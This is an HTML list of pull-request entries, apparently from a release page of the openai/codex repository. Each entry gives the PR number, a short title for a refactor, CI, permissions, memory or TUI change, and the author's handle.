<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326823885" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19490" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19490/hovercard" href="https://github.com/openai/codex/pull/19490">#19490</a> Streamline plugin, apps, and skills handlers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333070997" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19762" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19762/hovercard" href="https://github.com/openai/codex/pull/19762">#19762</a> refactor: make auth loading async <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efrazer-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efrazer-oai">@efrazer-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337975466" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19854" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19854/hovercard" href="https://github.com/openai/codex/pull/19854">#19854</a> ci: pin npm staging smoke test to a recent rust-release run <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337939332" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19851" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19851/hovercard" href="https://github.com/openai/codex/pull/19851">#19851</a> ci: migrate Bazel setup away from archived setup-bazelisk <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326824991" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19491" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19491/hovercard" href="https://github.com/openai/codex/pull/19491">#19491</a> Streamline account and command handlers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333337530" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19771" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19771/hovercard" href="https://github.com/openai/codex/pull/19771">#19771</a> fix: filter dynamic deferred tools from model_visible_specs <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sayan-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sayan-oai">@sayan-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338150859" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19863" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19863/hovercard" href="https://github.com/openai/codex/pull/19863">#19863</a> [codex-analytics] remove ga flag <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rhan-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rhan-oai">@rhan-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338219784" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19865" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19865/hovercard" href="https://github.com/openai/codex/pull/19865">#19865</a> Cap original-detail image token estimates <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fjord-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fjord-oai">@fjord-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329053575" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19591" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19591/hovercard" href="https://github.com/openai/codex/pull/19591">#19591</a> Fix filtered thread-list resume regression in TUI <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327340789" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19513" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19513/hovercard" href="https://github.com/openai/codex/pull/19513">#19513</a> Delay approval prompts while typing <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331884811" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19706" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19706/hovercard" href="https://github.com/openai/codex/pull/19706">#19706</a> Preserve TUI markdown list spacing after code blocks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337832311" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19841" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19841/hovercard" href="https://github.com/openai/codex/pull/19841">#19841</a> permissions: remove cwd special path <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326825792" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19492" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19492/hovercard" href="https://github.com/openai/codex/pull/19492">#19492</a> Streamline thread start handler <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338714402" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19874" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19874/hovercard" href="https://github.com/openai/codex/pull/19874">#19874</a> [codex-backend] Prefer state git metadata in filtered thread lists <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeytrasatti-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeytrasatti-openai">@joeytrasatti-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326826587" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19493" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19493/hovercard" href="https://github.com/openai/codex/pull/19493">#19493</a> Streamline thread mutation handlers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338146214" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19862" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19862/hovercard" href="https://github.com/openai/codex/pull/19862">#19862</a> [codex] Shard exec Bazel integration test <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/starr-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/starr-openai">@starr-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310128057" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18996" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18996/hovercard" href="https://github.com/openai/codex/pull/18996">#18996</a> Publish Python SDK with Codex-pinned versioning <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sdcoffey/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sdcoffey">@sdcoffey</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326827872" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19494" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19494/hovercard" href="https://github.com/openai/codex/pull/19494">#19494</a> Streamline thread read handlers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337782827" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19839" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19839/hovercard" href="https://github.com/openai/codex/pull/19839">#19839</a> [codex] Trace cancelled inference streams <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassirer-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassirer-openai">@cassirer-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326829397" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19495" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19495/hovercard" href="https://github.com/openai/codex/pull/19495">#19495</a> Streamline thread resume and fork handlers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326832625" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19497" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19497/hovercard" href="https://github.com/openai/codex/pull/19497">#19497</a> Streamline turn and realtime handlers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284635268" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18372" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18372/hovercard" href="https://github.com/openai/codex/pull/18372">#18372</a> Show action required in terminal title <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339265719" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19884" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19884/hovercard" href="https://github.com/openai/codex/pull/19884">#19884</a> Add MCP app feature flag <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzeng-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzeng-openai">@mzeng-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326833869" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19498" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19498/hovercard" href="https://github.com/openai/codex/pull/19498">#19498</a> Streamline review and feedback handlers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333376156" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19772" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19772/hovercard" href="https://github.com/openai/codex/pull/19772">#19772</a> permissions: derive config defaults as profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337616105" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19836" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19836/hovercard" href="https://github.com/openai/codex/pull/19836">#19836</a> disallow fileparams metadata for custom mcps <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colby-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colby-oai">@colby-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339613554" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19892" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19892/hovercard" href="https://github.com/openai/codex/pull/19892">#19892</a> Refactor exec-server filesystem API into codex-file-system <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/miz-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/miz-openai">@miz-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325812357" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19452" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19452/hovercard" href="https://github.com/openai/codex/pull/19452">#19452</a> Stabilize plugin MCP fixture tests <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylan-hurd-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylan-hurd-oai">@dylan-hurd-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326607531" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19481" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19481/hovercard" href="https://github.com/openai/codex/pull/19481">#19481</a> Remove ghost snapshots  <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333376227" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19773" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19773/hovercard" href="https://github.com/openai/codex/pull/19773">#19773</a> permissions: require profiles in TUI thread state <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340273802" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19917" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19917/hovercard" href="https://github.com/openai/codex/pull/19917">#19917</a> Allow /statusline and /title slash commands during active turns <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333071610" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19763" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19763/hovercard" href="https://github.com/openai/codex/pull/19763">#19763</a> refactor: load agent identity runtime eagerly <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efrazer-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efrazer-oai">@efrazer-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4257661359" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/17689" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/17689/hovercard" href="https://github.com/openai/codex/pull/17689">#17689</a> [codex-analytics] include user agent in default headers <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marksteinbrick-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marksteinbrick-oai">@marksteinbrick-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340162343" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19912" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19912/hovercard" href="https://github.com/openai/codex/pull/19912">#19912</a> Clarify PR template invitation requirement <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329900789" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19630" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19630/hovercard" href="https://github.com/openai/codex/pull/19630">#19630</a> Avoid persisting ShutdownComplete after thread shutdown <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333376386" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19774" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19774/hovercard" href="https://github.com/openai/codex/pull/19774">#19774</a> permissions: make SessionConfigured profile-only <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333376456" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19775" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19775/hovercard" href="https://github.com/openai/codex/pull/19775">#19775</a> permissions: derive snapshot sandbox projections <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340388395" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19920" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19920/hovercard" href="https://github.com/openai/codex/pull/19920">#19920</a> Allow large remote app-server resume responses <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333376505" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19776" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19776/hovercard" href="https://github.com/openai/codex/pull/19776">#19776</a> permissions: store thread sessions as profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339748336" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19899" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19899/hovercard" href="https://github.com/openai/codex/pull/19899">#19899</a> app-server-protocol: mark permission profiles experimental <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340887957" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19933" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19933/hovercard" href="https://github.com/openai/codex/pull/19933">#19933</a> Add <code>codex update</code> command <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340225439" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19914" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19914/hovercard" href="https://github.com/openai/codex/pull/19914">#19914</a> feat: Cache remote plugin bundles on install <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xl-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xl-openai">@xl-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325935276" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19456" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19456/hovercard" href="https://github.com/openai/codex/pull/19456">#19456</a> Add remote plugin uninstall API <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xli-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xli-oai">@xli-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335433879" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19805" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19805/hovercard" href="https://github.com/openai/codex/pull/19805">#19805</a> Add MultiAgentV2 root and subagent context hints <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338118178" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19860" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19860/hovercard" href="https://github.com/openai/codex/pull/19860">#19860</a> feat: split memories part 2 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342451107" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19961" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19961/hovercard" href="https://github.com/openai/codex/pull/19961">#19961</a> feat: fix hinting 2 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342496320" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19963" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19963/hovercard" href="https://github.com/openai/codex/pull/19963">#19963</a> feat: fix hinting 3 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342683349" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19967" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19967/hovercard" href="https://github.com/openai/codex/pull/19967">#19967</a> Stabilize memory Phase 2 input ordering <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342873281" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19970" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19970/hovercard" href="https://github.com/openai/codex/pull/19970">#19970</a> feat: trigger memories from user turns with cooldown <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339888960" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19904" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19904/hovercard" href="https://github.com/openai/codex/pull/19904">#19904</a> fix: configure AgentIdentity AuthAPI base URL <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efrazer-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efrazer-oai">@efrazer-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343996539" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19990" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19990/hovercard" href="https://github.com/openai/codex/pull/19990">#19990</a> feat: skip memory startup when Codex rate limits are low <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344155574" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19998" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19998/hovercard" href="https://github.com/openai/codex/pull/19998">#19998</a> feat: house-keeping memories 1 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344200581" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20000" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20000/hovercard" href="https://github.com/openai/codex/pull/20000">#20000</a> feat: house-keeping memories 2 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337190864" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19832" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19832/hovercard" href="https://github.com/openai/codex/pull/19832">#19832</a> Preserve assistant phase for replayed messages <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/friel-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/friel-openai">@friel-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329774759" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19625" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19625/hovercard" href="https://github.com/openai/codex/pull/19625">#19625</a> Reset TUI keyboard reporting on exit <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291981891" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/18593" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/18593/hovercard" href="https://github.com/openai/codex/pull/18593">#18593</a> feat(tui): add configurable keymap support <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcoury-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcoury-oai">@fcoury-oai</a></li>
